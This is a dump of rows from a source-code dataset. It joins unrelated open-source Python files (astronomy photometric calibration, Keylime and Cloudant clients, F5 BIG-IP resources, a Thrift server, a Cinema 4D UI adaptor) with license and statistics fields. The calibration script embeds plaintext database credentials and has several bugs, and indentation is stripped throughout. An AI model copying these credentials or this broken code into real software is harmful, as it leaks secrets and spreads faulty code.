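# Note: TO_BE_BORN and TO_LIVE come from game.py (not shown). For Conway's
# standard rules they would presumably be TO_BE_BORN = [3] (a dead cell with
# exactly 3 live neighbors is born) and TO_LIVE = [2, 3] (a live cell with 2 or 3
# live neighbors survives); create_life() above applies exactly that membership
# test to the neighbor counts.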
def get_neighbors(life):
neighbors = []
if life != None:
for cell in life:
neighbors.extend(cell.list_neighbors())
return neighbors
|
mit
| 5,229,378,662,050,004,000
| 21.946237
| 84
| 0.556232
| false
| 3.647863
| false
| false
| false
|
deapplegate/wtgpipeline
|
photo_illum.py
|
1
|
18300
|
#!/usr/bin/env python
# Python module for photometric calibration.
# It needs the Python modules ppgplot and
# mpfit to be installed.
# 03.03.2005 Fixed a serious bug in the rejection loop. Instead
# of using the remaining points we always used all points
# and rejected points until the original fit matched the data
# 15.02.2005 Fixed the range of the y-axes in the plots to more
# sensible values
# 14.02.2005 Fixed a bug when more parameters were fitted than
# data points were present
# We now rescale points to the airmass/color at which
# they are plotted (zero)
# Check that label is set
# 10.12.2004 Now takes a new argument "label" to be
# used as axis label in the color plot
import copy
import getopt
import string
import sys
import mpfit
import Numeric
from ppgplot import *
import BonnLogger
def illum_funct(p, fjac=None, X=None, Y=None, y=None, err=None):
    # data (y) and errors (err) added to the signature to match the other fit functions below
    [A, B, C, D, E, F] = p
    model = A*X**2 + B*Y**2 + C*X*Y + D*X + E*Y + F
    status = 0
    return([status, (model-y)/err])
def phot_funct_2(p, fjac=None, y=None, err=None):
model = p[0]
status = 0
return([status, (model-y)/err])
def phot_funct_1(p, fjac=None, color=None, y=None, err=None):
model = p[0] + p[1]*color
status = 0
return([status, (model-y)/err])
def phot_funct_0(p, fjac=None, airmass=None, color1=None, color2=None, y=None, err=None):
model = p[0] + p[1]*color1 + p[2]*color2
status = 0
return([status, (model-y)/err])
def readInput(file):
f = open(file, "r")
instMagList = []
stdMagList = []
magErrList = []
colList = []
airmassList = []
for line in f.readlines():
instMag, stdMag, col, airmass, instMagErr, stdMagErr = string.split(line)
magErr = (float(instMagErr)**2. + float(stdMagErr)**2.)**0.5
magErrList.append(magErr)
instMagList.append(float(instMag))
stdMagList.append(float(stdMag))
colList.append(float(col))
airmassList.append(float(airmass))
f.close()
instMag = Numeric.array(instMagList)
stdMag = Numeric.array(stdMagList)
data = stdMag - instMag
airmass = Numeric.array(airmassList)
color = Numeric.array(colList)
magErr = Numeric.array(magErrList)
return data, airmass, color, magErr
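# Each input line is expected to hold six whitespace-separated columns; values
# below are made up for illustration:
#
#   18.432  17.951  0.65  1.12  0.012  0.008
#   (instMag stdMag  color airmass instMagErr stdMagErr)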
#def photCalib(dictionary, p, sigmareject, maxSigIter=50):
def photCalib(data_save, airmass_save, color_save, err_save, p, sigmareject, maxSigIter=50):
    save_len = len(data_save)
parinfos = [[{"value": p[0], "fixed": 0},{"value": p[1], "fixed": 0, "limited": [0,1], "limits": [-99, 0]},{"value": p[2], "fixed": 0}],[{"value": p[0], "fixed": 0},{"value": p[1], "fixed": 0}],[{"value": p[0], "fixed": 0}]]
phot_functs = [phot_funct_0, phot_funct_1, phot_funct_2]
solutions = []
for fit_type in [0,1,2]:
airmass = copy.copy(airmass_save)
color = copy.copy(color_save)
data_tmp = copy.copy(data_save)
err = copy.copy(err_save)
#first apply coefficients we are holding fixed
data = copy.copy(data_tmp)
if fit_type == 1:
for i in range(len(data_tmp)):
data[i] = data_tmp[i] - p[1]*airmass[i]
if fit_type == 2:
for i in range(len(data_tmp)):
data[i] = data_tmp[i] - p[1]*airmass[i] - p[2]*color[i]
print data_tmp[0], data[0]
data_rec = copy.copy(data)
parinfo = parinfos[fit_type]
#for j in range(len(parinfo)):
#if j in fixedList:
# print "Element", j, "is fixed at", p[j]
# parinfo[j]["fixed"] = 1
#else:
# parinfo[j]["fixed"] = 0
for i in range(maxSigIter):
old_len = len(data)
fas = [{"airmass": airmass,"color": color, "y": data, "err": err},{"color": color,"y": data, "err": err}, {"y": data, "err": err}]
fa = fas[fit_type]
phot_funct = phot_functs[fit_type]
m = mpfit.mpfit(phot_funct, functkw=fa,
parinfo=parinfo,
maxiter=1000, quiet=1)
print m.covar, m.params, m.perror
if (m.status <= 0):
print 'error message = ', m.errmsg
condition = Numeric.zeros(len(data))
break
#airmass = copy.copy(airmass_save)
#color = copy.copy(color_save)
#data = copy.copy(data_save)
#err = copy.copy(err_save)
# Compute a 3 sigma rejection criterion
#condition = preFilter(m.params, data_save, data,
# airmass_save, airmass,
# color_save, color)
params = [0,0,0]
perror = [0,0,0]
print m.params,m.perror, m.covar
if fit_type == 0:
params = copy.copy(m.params)
perror = copy.copy(m.perror)
if fit_type == 1:
params[0] = m.params[0]
params[2] = m.params[1]
params[1] = p[1]
perror[0] = m.perror[0]
perror[2] = m.perror[1]
if fit_type == 2:
params[0] = m.params[0]
params[1] = p[1]
params[2] = p[2]
perror[0] = m.perror[0]
# Compute a 3 sigma rejection criterion
print params, data_rec[0], data[0]
condition, redchisq = SigmaCond(params, data_save, data,
airmass_save, airmass,
color_save, color, err_save, err, sigmareject)
print redchisq
# Keep everything (from the full data set!) that is within
# the 3 sigma criterion
#data_sig = Numeric.compress(condition, data_save)
data = Numeric.compress(condition, data_rec)
airmass = Numeric.compress(condition, airmass_save)
color = Numeric.compress(condition, color_save)
err = Numeric.compress(condition, err_save)
new_len = len(data)
if float(new_len)/float(save_len) < 0.5:
print "Rejected more than 50% of all measurements."
print "Aborting this fit."
break
# No change
if new_len == old_len:
print "Converged! (%d iterations)" % (i+1, )
print "Kept %d/%d stars." % (new_len, save_len)
break
print params, perror, condition
meanerr = Numeric.sum(err_save)/len(err_save)
solutions.append([params, perror, redchisq, meanerr, condition])
return solutions
def SigmaCond(p, data_save, data, airmass_save, airmass, color_save, color, err_save, err, sigmareject):
if len(data_save) > 1:
#airmass = airmass[int(0.1*len(airmass)):int(0.9*len(airmass))]
#color = color[int(0.1*len(color)):int(0.9*len(color))]
#data = data[int(0.1*len(data)):int(0.9*len(data))]
mo = p[0] + p[1]*airmass + p[2]*color
mo_save = p[0] + p[1]*airmass_save + p[2]*color_save
print len(data), len(mo), len(err)
reddm = (data-mo)/err
redchisq = Numeric.sqrt(Numeric.sum(Numeric.power(reddm, 2)) / (len(reddm) - 1))
dm = data-mo
dm_save = data_save - mo_save
mean = Numeric.sum(dm)/len(dm)
sigma = Numeric.sqrt(Numeric.sum(Numeric.power(mean-dm, 2)) / (len(dm) - 1))
#condition = Numeric.less(Numeric.fabs(dm_save), float(sigmareject) * sigma)
condition = Numeric.less(Numeric.fabs(dm_save), float(sigmareject) * err_save)
else:
condition = Numeric.zeros(len(data_save))
return condition, redchisq
def makePlots(data, airmass, color, outfile, solutions, label):
file = outfile+".ps"
pgbeg(file+"/cps", 2, 3)
pgiden()
for i in range(3):
result = solutions[i]
# Airmass plot
pgpanl(1, i+1)
airMin = 1
airMax = Numeric.sort(airmass)[-1]*1.1
print result
dataAirMax = result[0][0]+result[0][1]+1
dataAirMin = result[0][0]+result[0][1]-1
dataColMax = result[0][0]+1
dataColMin = result[0][0]-1
colMinVal = Numeric.sort(color)[0]
if colMinVal < 0:
colMin = colMinVal*1.1
else:
colMin = colMinVal*0.95
colMax = Numeric.sort(color)[-1]*1.1
if result[0] and result[1]:
eqStr = "%d parameter fit: Mag-Mag(Inst) = %.2f\\(2233)%.2f + (%.2f\\(2233)%.2f) airmass + "\
"(%.2f\\(2233)%.2f) color" % \
(3-i, result[0][0], result[1][0], result[0][1], result[1][1], result[0][2], result[1][2])
else:
eqStr = "%d parameter fit not possible" % (3-i, )
fixenv([1, airMax] ,
[dataAirMin, dataAirMax],
eqStr, label=["Airmass", "Mag - Mag(Inst)"])
condition = result[4]
goodAirmass = Numeric.compress(condition, airmass)
goodData = Numeric.compress(condition, data)
goodColor = Numeric.compress(condition, color)
badAirmass = Numeric.compress(Numeric.logical_not(condition), airmass)
badData = Numeric.compress(Numeric.logical_not(condition), data)
badColor = Numeric.compress(Numeric.logical_not(condition), color)
if len(goodData):
pgsci(3)
# Rescale to zero color and filter for data within
# our plotting range
plotData = goodData-result[0][2]*goodColor
plotCond1 = Numeric.less(plotData, dataAirMax)
plotCond2 = Numeric.greater(plotData, dataAirMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotAirmass = Numeric.compress(plotCond, goodAirmass)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotAirmass, plotData, 5)
print type(plotAirmass), type(plotData)
if len(badData):
pgsci(2)
plotData = badData-result[0][2]*badColor
plotCond1 = Numeric.less(plotData, dataAirMax)
plotCond2 = Numeric.greater(plotData, dataAirMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotAirmass = Numeric.compress(plotCond, badAirmass)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotAirmass, plotData, 5)
pgsci(1)
a = Numeric.arange(1, airMax, 0.01)
m = result[0][0] + result[0][1] * a
pgline(a, m)
# Color Plot
pgpanl(2, i+1)
fixenv([colMin, colMax] ,
[dataColMin, dataColMax],
eqStr, label=[label, "Mag - Mag(Inst)"])
if len(goodData):
pgsci(3)
# Rescale to zero airmass and filter for data within
# our plotting range
plotData = goodData-result[0][1]*goodAirmass
plotCond1 = Numeric.less(plotData, dataColMax)
plotCond2 = Numeric.greater(plotData, dataColMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotColor = Numeric.compress(plotCond, goodColor)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotColor, plotData, 5)
if len(badData):
pgsci(2)
plotData = badData-result[0][1]*badAirmass
plotCond1 = Numeric.less(plotData, dataColMax)
plotCond2 = Numeric.greater(plotData, dataColMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotColor = Numeric.compress(plotCond, badColor)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotColor, plotData, 5)
pgsci(1)
a = Numeric.arange(colMin, colMax, 0.01)
m = result[0][0] + result[0][2] * a
pgline(a, m)
return
def fixenv (xrange=[0,1], yrange=[0,1], fname="none", ci = 1, label=["x", "y"]):
# set axis ranges.
pgswin(xrange[0], xrange[1], yrange[0], yrange[1])
pgsci(ci) # set color index.
pgbox() # draw axes.
pgsci(1) # back to color index 1 (white)
pglab(label[0], label[1], fname) # label the plot
return
def saveResults(file, solutions, step, sigmareject, cluster, colorused):
f = open(file+".asc", "w")
which_solution = 0
import MySQLdb, sys, os, re
db2 = MySQLdb.connect(db='subaru', user='weaklensing', passwd='darkmatter', host='ki-rh8')
c = db2.cursor()
#c.execute("DROP TABLE IF EXISTS photometry_db")
for result in solutions:
which_solution += 1
if Numeric.sometrue(result[2]):
import os , time
user_name = os.environ['USER']
bonn_target = os.environ['BONN_TARGET']
bonn_filter = os.environ['BONN_FILTER']
time_now = time.asctime()
user = user_name #+ str(time.time())
standardstartype = os.environ['STANDARDSTARTYPE']
floatvars = {'ZP':result[0][0],'AIRMASS':result[0][1],'COLOR':result[0][2],'ZPERR':result[1][0],'AIRMASSERR':result[1][1],'COLORERR':result[1][2],'REDCHISQ':result[2],'MEANERR':result[3]}
stringvars = {'USER':user_name,'BONN_TARGET':bonn_target,'BONN_FILTER':bonn_filter,'TIME':time_now,'CHOICE':'', 'NUMBERVARS':4-which_solution,'STANDARDSTARTYPE':standardstartype,'USER': user, 'step': step, 'sigmareject':sigmareject, 'cluster':cluster,'colorused':colorused}
# make database if it doesn't exist
make_db = reduce(lambda x,y: x + ',' + y,[x + ' float(30)' for x in floatvars.keys()])
make_db += ',' + reduce(lambda x,y: x + ',' + y,[x + ' varchar(80)' for x in stringvars.keys()])
command = "CREATE TABLE IF NOT EXISTS photometry_db ( id MEDIUMINT NOT NULL AUTO_INCREMENT, PRIMARY KEY (id), " + make_db + ")"
print command
#c.execute(command)
# insert new observation
names = reduce(lambda x,y: x + ',' + y, [x for x in floatvars.keys()])
values = reduce(lambda x,y: str(x) + ',' + str(y), [floatvars[x] for x in floatvars.keys()])
names += ',' + reduce(lambda x,y: x + ',' + y, [x for x in stringvars.keys()])
values += ',' + reduce(lambda x,y: x + ',' + y, ["'" + str(stringvars[x]) + "'" for x in stringvars.keys()])
command = "INSERT INTO photometry_db (" + names + ") VALUES (" + values + ")"
print command
#c.execute(command)
f.write("%s %s %s\n" % (result[0][0], result[0][1], result[0][2]))
f.write("%s %s %s\n" % (result[1][0], result[1][1], result[1][2]))
f.write("%s#ReducedChiSq\n" % (result[2]))
f.write("%s#MeanError\n" % (result[3]))
f.write("%s\n" % (id))
else:
f.write("-1 -1 -1\n")
f.write("-1 -1 -1\n")
f.write("-1#ReducedChiSq\n")
f.write("-1#MeanError\n")
f.write("%s\n" % (id))
f.close
return id
def usage():
print "Usage:"
print "photo_abs.py -i input -f filter -n GABODSID - e ext. coeff. -c color coeff. -o output -l label"
print
print " -i, --input=STRING Input file, must have 4 columns: Instrumental Mag, Standard Mag, Color, Airmass"
print " -o, --output=STRING Output file basename"
print " -n, --night=INT GABODSID, unique numerical night identifier"
print " -e, --extinction=FLOAT Default value of extinction coefficient for one/two parameter fit"
print " -c, --color=FLOAT Default value of color term for one parameter fit"
print " -l, --label=STRING Label for color axis (e.g. B-V)"
print
print "Author:"
print " Joerg Dietrich <dietrich@astro.uni-bonn.de>"
print
return
if __name__ == "__main__":
__bonn_logger_id__ = BonnLogger.addCommand('maskBadOverscans.py',
sys.argv[1:])
try:
opts, args = getopt.getopt(sys.argv[1:],
"i:n:o:e:c:l:s:",
["input=", "night=", "extinction=",
"color=", "output=", "label=","sigmareject=","step=","cluster=","colorused="])
except getopt.GetoptError:
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
print sys.argv[1:]
infile = night = extcoeff = colcoeff = outfile = label = sigmareject = step = cluster = colorused = None
for o, a in opts:
if o in ("-i", "--input"):
infile = a
elif o in ("-o", "--output"):
outfile = a
elif o in ("-n", "--night"):
night = int(a)
elif o in ("-e", "--extinction"):
extcoeff = float(a)
elif o in ("-c", "--color"):
colcoeff = float(a)
elif o in ("-l", "--label"):
label = a
elif o in ("-s", "--sigmareject"):
sigmareject = float(a)
elif o in ("-t", "--step"):
step = a
elif o in ("-c", "--cluster"):
cluster = a
elif o in ("-u", "--colorused"):
colorused = a
else:
print "option:", o
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
print cluster
#raw_input()
if not infile or night==None or not outfile or \
extcoeff==None or colcoeff==None or label==None:
#print infile, night, outfile, coeff, color
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
data, airmass, color, magErr = readInput(infile)
    solutions = photCalib(data, airmass, color, magErr, [24, extcoeff, colcoeff], sigmareject)
    # Experimental dictionary-based interface sketches (incomplete, kept for reference):
    #solutions = photCalib({'data':data, 'dataerr':dataerr, vars:{'airmass':airmass, 'color':color}, 'guesses':{'airmasscoeff': airmasscoeff, 'colorcoeff':colorcoeff}, 'sigmareject':sigmareject, fit=[{'function':func_0(airmass,color)},{'function'['color']]})
    #solutions = photCalib({'data':data, 'dataerr':dataerr, vars:{'X':X,'Y':Y}, 'sigmareject':sigmareject, fit=[['A','B','C','D','E','F'],['color']]})
makePlots(data, airmass, color, outfile, solutions, label)
saveResults(outfile, solutions, step, sigmareject, cluster, colorused)
BonnLogger.updateStatus(__bonn_logger_id__, 0)
|
mit
| 5,730,884,299,488,931,000
| 37.771186
| 279
| 0.556175
| false
| 3.305039
| false
| false
| false
|
google/ffn
|
ffn/utils/png_to_h5.py
|
1
|
1099
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts PNG files from the working directory into a HDF5 volume.
Usage:
./png_to_h5.py output_filename.h5
"""
import glob
import sys
import h5py
import numpy as np
from scipy import misc
assert len(sys.argv) >= 2
png_files = glob.glob('*.png')
png_files.sort()
images = [misc.imread(i) for i in png_files]
images = np.array(images)
with h5py.File(sys.argv[1], 'w') as f:
f.create_dataset('raw', data=images, compression='gzip')
|
apache-2.0
| 2,254,648,750,721,236,200
| 29.527778
| 80
| 0.682439
| false
| 3.712838
| false
| false
| false
|
mit-ll/python-keylime
|
keylime/requests_client.py
|
1
|
1577
|
import requests
class RequestsClient:
def __init__(self, base_url, tls_enabled, **kwargs):
if tls_enabled:
self.base_url = f'https://{base_url}'
else:
self.base_url = f'http://{base_url}'
self.session = requests.Session()
for arg in kwargs:
if isinstance(kwargs[arg], dict):
kwargs[arg] = self.__deep_merge(
getattr(self.session, arg), kwargs[arg])
setattr(self.session, arg, kwargs[arg])
def request(self, method, url, **kwargs):
return self.session.request(method, self.base_url + url, **kwargs)
def head(self, url, **kwargs):
return self.session.head(self.base_url + url, **kwargs)
def get(self, url, **kwargs):
return self.session.get(self.base_url + url, **kwargs)
def post(self, url, **kwargs):
return self.session.post(self.base_url + url, **kwargs)
def put(self, url, **kwargs):
return self.session.put(self.base_url + url, **kwargs)
def patch(self, url, **kwargs):
return self.session.patch(self.base_url + url, **kwargs)
def delete(self, url, **kwargs):
return self.session.delete(self.base_url + url, **kwargs)
@staticmethod
def __deep_merge(source, destination):
for key, value in source.items():
if isinstance(value, dict):
node = destination.setdefault(key, {})
RequestsClient.__deep_merge(value, node)
else:
destination[key] = value
return destination
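# Illustrative sketch only -- host, port and endpoint path are placeholders:
#
#   client = RequestsClient("127.0.0.1:8881", tls_enabled=True, verify=False)
#   response = client.get("/version")
#   print(response.status_code)
#
# Keyword arguments (e.g. headers, cert, verify) are merged into the underlying
# requests.Session, with nested dicts deep-merged by __deep_merge().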
|
bsd-2-clause
| -8,650,900,157,701,840,000
| 33.282609
| 74
| 0.577045
| false
| 3.846341
| false
| false
| false
|
evansde77/metson
|
src/cloudant/changes.py
|
1
|
2389
|
#!/usr/bin/env python
"""
_feeds_
Iterator support for consuming changes-like feeds
"""
import json
class Feed(object):
"""
_Feed_
Acts as an infinite iterator for consuming database feeds such as
_changes, suitable for feeding a daemon.
    :params:
        session - request session used to issue HTTP calls against the feed URL
        url - URL of the feed endpoint (e.g. a database _changes URL)
        include_docs - if True, ask the server to include documents in the feed
        since - optional sequence value to resume the feed from (keyword arg)
        continuous - if True, restart the feed whenever last_seq is seen (keyword arg)
"""
def __init__(self, session, url, include_docs=False, **kwargs):
self._session = session
self._url = url
self._resp = None
self._line_iter = None
self._last_seq = kwargs.get('since')
self._continuous = kwargs.get('continuous', False)
self._end_of_iteration = False
self._params = {'feed': 'continuous'}
if include_docs:
self._params['include_docs'] = 'true'
def start(self):
"""
_start_
Using the provided session, start streaming
the feed continuously,
if a last seq value is present, pass that along.
"""
params = self._params
if self._last_seq is not None:
params['since'] = self._last_seq
self._resp = self._session.get(self._url, params=params, stream=True)
self._resp.raise_for_status()
self._line_iter = self._resp.iter_lines()
def __iter__(self):
"""
make this object an iterator
"""
return self
def __next__(self):
"""python3 compat"""
return self.next()
def next(self):
"""
_next_
Iterate: pull next line out of the stream,
attempt to convert the response to JSON, handling
case of empty lines.
If end of feed is seen, restart iterator
Returns JSON data representing what was seen in the feed.
"""
if self._end_of_iteration:
raise StopIteration
if not self._resp:
self.start()
        line = next(self._line_iter)  # works under both Python 2 and 3
if len(line.strip()) == 0:
return {}
try:
data = json.loads(line)
except ValueError:
data = {"error": "Bad JSON line", "line": line}
if data.get('last_seq'):
if self._continuous:
# forever mode => restart
self._last_seq = data['last_seq']
self.start()
return {}
else:
# not forever mode => break
return data
return data
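# Rough usage sketch (session, URL and consumer are placeholders):
#
#   feed = Feed(session, 'https://account.cloudant.com/dbname/_changes',
#               include_docs=True, since=None, continuous=True)
#   for change in feed:
#       if change:
#           handle(change)   # hypothetical consumer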
|
apache-2.0
| -1,144,968,541,716,865,700
| 24.688172
| 77
| 0.529929
| false
| 4.351548
| false
| false
| false
|
F5Networks/f5-common-python
|
f5/bigip/tm/security/shared_objects.py
|
1
|
3549
|
# coding=utf-8
#
# Copyright 2015-2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""BIG-IP® Advanced Firewall Manager™ (AFM®) module.
REST URI
``http://localhost/mgmt/tm/security/shared-objects``
GUI Path
``Security --> Network Address Translation``
REST Kind
``tm:security:shared-objects:*``
"""
from distutils.version import LooseVersion
from f5.bigip.resource import Collection
from f5.bigip.resource import OrganizingCollection
from f5.bigip.resource import Resource
class Shared_Objects(OrganizingCollection):
"""BIG-IP® AFM® Nat organizing collection."""
def __init__(self, security):
super(Shared_Objects, self).__init__(security)
self._meta_data['minimum_version'] = '14.0.0'
self._meta_data['allowed_lazy_attributes'] = [
Address_Lists,
Port_Lists]
class Address_Lists(Collection):
"""BIG-IP® AFM® Address List collection"""
def __init__(self, shared_objects):
super(Address_Lists, self).__init__(shared_objects)
self._meta_data['allowed_lazy_attributes'] = [Address_List]
self._meta_data['attribute_registry'] = \
{'tm:security:shared-objects:address-list:address-liststate':
Address_List}
class Address_List(Resource):
"""BIG-IP® Address List resource"""
def __init__(self, address_lists):
super(Address_List, self).__init__(address_lists)
self._meta_data['required_json_kind'] = \
'tm:security:shared-objects:address-list:address-liststate'
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_load_parameters'].update(('partition',))
self.tmos_ver = self._meta_data['bigip'].tmos_version
if LooseVersion(self.tmos_ver) < LooseVersion('12.0.0'):
self._meta_data['minimum_additional_parameters'] = {
'addressLists', 'addresses', 'geo'}
else:
self._meta_data['minimum_additional_parameters'] = {
'addressLists', 'addresses', 'geo', 'fqdns'}
class Port_Lists(Collection):
"""BIG-IP® AFM® Port List collection"""
def __init__(self, shared_objects):
super(Port_Lists, self).__init__(shared_objects)
self._meta_data['allowed_lazy_attributes'] = [Port_List]
self._meta_data['attribute_registry'] = \
{'tm:security:shared-objects:port-list:port-liststate':
Port_List}
class Port_List(Resource):
"""BIG-IP® Port List resource"""
def __init__(self, port_lists):
super(Port_List, self).__init__(port_lists)
self._meta_data['required_json_kind'] = \
'tm:security:shared-objects:port-list:port-liststate'
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_load_parameters'].update(('partition',))
self._meta_data['minimum_additional_parameters'] = {'ports',
'portLists'}
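# Rough usage sketch (attribute path follows the library's usual lowercase naming
# convention; host and credentials are placeholders):
#
#   from f5.bigip import ManagementRoot
#
#   mgmt = ManagementRoot('bigip.example.com', 'admin', 'secret')
#   addr_lists = mgmt.tm.security.shared_objects.address_lists.get_collection()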
|
apache-2.0
| -1,649,058,166,927,586,600
| 37.445652
| 78
| 0.642352
| false
| 3.836226
| false
| false
| false
|
serendio-labs-stage/diskoveror-ml-server
|
TopicThrift/server.py
|
1
|
1840
|
'''
Copyright 2015 Serendio Inc.
Author - Satish Palaniappan
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
'''
__author__ = "Satish Palaniappan"
### Insert Current Path
import os, sys, inspect
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
sys.path.append(cmd_folder + '/gen-py')
from categorizer import Categorizer
from categorizer.ttypes import *
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
import socket
sys.path.append(cmd_folder + "/Model/")
import Categorize
class CategorizerHandler:
def __init__(self):
self.log = {}
self.catz = Categorize.Categorize()
def ping(self):
print ("Ping Success !! :)")
return
def getTopic(self, text):
cat = self.catz.getCategory(text)
print ("The Text : " + text + " ||| Topic: " + cat)
return cat
handler = CategorizerHandler()
processor = Categorizer.Processor(handler)
transport = TSocket.TServerSocket(port=8001)
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
print ("Python topics server running...")
server.serve()
|
apache-2.0
| -1,131,072,699,975,567,200
| 31.280702
| 168
| 0.755978
| false
| 3.687375
| false
| false
| false
|
corredD/upy
|
cinema4d/r20/c4dUI.py
|
1
|
40522
|
"""
Copyright (C) <2010> Autin L. TSRI
This file git_upy/cinema4d/r14/c4dUI.py is part of upy.
upy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
upy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with upy. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.
"""
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 2 18:17:17 2010
@author: -
"""
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 2 13:45:52 2010
@author: -
"""
import sys,os
import c4d
from c4d import plugins
from c4d import utils
from c4d import bitmaps
from c4d import gui
import random
from upy.uiAdaptor import uiAdaptor
#UI general interface
class c4dUI(gui.GeDialog):
"""
The cinema4d uiAdaptor abstract class
====================================
    This adaptor gives access to the basic Cinema 4D draw functions needed to
    create and display a GUI.
"""
host = "c4d"
scale = 1
maxStrLenght=100
left, top, right, bottom =(25,1,1,1)
oid=1005
bid=1005
id = 1005
plugid = int(random.random()*10000000)
dock = False
w=100
h=100
tab=False
notebook = None
ystep = 0
scrolling = True
def addVariablePropToSc (self, *args):
#ghost function
pass
def CoreMessage(self, id, msg):
""" Hanlde the system event such as key or mouse position """
# print "coremessage"
# print "id",id
# print "msg",msg
return True
#-1008
#20000000073
def _setTitle(self,title):
self.SetTitle(title)
def createMenu(self,menuDic,menuOrder=None):
""" Define and draw the window/widget top file menu
@type menuDic: dictionary
@param menuDic: the menu elements, ie entry, callback and submenu
@type menuOrder: array
@param menuOrder: the menu keys oredered
"""
if menuOrder :
lookat = menuOrder
else :
lookat = menuDic.keys()
self.MenuFlushAll()
for mitem in lookat:
self.MenuSubBegin(mitem)
for elem in menuDic[mitem]:
if elem["sub"] is not None:
self.MenuSubBegin(elem["name"])
for sub in elem['sub']:
self.MenuAddString(elem['sub'][sub]["id"],
elem['sub'][sub]["name"])
self.MenuSubEnd()
else:
self.MenuAddString(elem["id"],elem["name"])
self.MenuSubEnd()
self.MenuFinished()
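    # Illustrative sketch of the expected menuDic structure (keys inferred from
    # handleMenuEvent below; ids and callbacks are placeholders):
    #
    #   menuDic = {
    #       "File": [
    #           {"id": 1010, "name": "Open", "action": self.open_cb, "sub": None},
    #           {"id": 1011, "name": "Recent", "action": None,
    #            "sub": {0: {"id": 1012, "name": "last.ses", "action": self.load_cb}}},
    #       ],
    #   }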
def handleMenuEvent(self,ev,menu):
""" This function handle the particular menu event, especially for
submenu level action
@type ev: int
@param ev: the current event
@type menu: dictionary
@param menu: the current menu
"""
#verify Enter?
print "menu",ev
if ev == 1056 :
return
for menuId in menu.keys():
for elem in menu[menuId]:
if elem["sub"] is not None:
for sub in elem['sub'].keys():
#print ev,elem['sub'][sub]["id"]
if ev == elem['sub'][sub]["id"] :
#print elem['sub'][sub]
if self._timer :
self.timeFunction(elem['sub'][sub]["action"],ev)
else :
self.callbackaction(elem['sub'][sub],ev)
else :
if ev==elem["id"] :
if self._timer :
self.timeFunction(elem["action"],ev)
else :
self.callbackaction(elem,ev)
def addVariable(self,type,value):
""" Create a container for storing a widget states """
return value
def drawObj(self,elem,x,y,w=None,h=None):
""" Draw an object input where you can drag on object
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
pass
#elem["id"] = gui.LinkBoxGui()
def getFlagAlignement(self,options):
alignement = {"hleft_scale":c4d.BFH_LEFT|c4d.BFH_SCALE| c4d.BFV_MASK,
"hcenter_scale":c4d.BFH_CENTER|c4d.BFH_SCALE| c4d.BFV_MASK,
"hleft":c4d.BFH_LEFT| c4d.BFV_MASK,
"hfit":c4d.BFH_FIT| c4d.BFV_MASK,
"hfit_scale":c4d.BFH_SCALEFIT| c4d.BFV_MASK,
"hcenter":c4d.BFH_CENTER| c4d.BFV_MASK,
}
if type(options) is int :
return options
elif options not in alignement :
print options
return c4d.BFH_SCALEFIT|c4d.BFV_MASK
return alignement[options]
def drawButton(self,elem,x,y,w=None,h=None):
""" Draw a Button
@type elem: dictionary
@param elem: the button dictionary
@type x: int
@param x: position on x in the gui windows
@type y: int
@param y: position on y in the gui windows
@type w: int
@param w: force the width of the item
@type h: int
@param h: force the height of the item
"""
if elem["alignement"] is None :
elem["alignement"] = c4d.BFH_CENTER | c4d.BFV_MASK
name = elem["name"]
if elem["label"] != None:
name = elem["label"]
self.AddButton(id=elem["id"], flags=elem["alignement"],
initw=elem["width"]*self.scale,
inith=elem["height"]*self.scale,
name=name)
def drawCheckBox(self,elem,x,y,w=None,h=None):
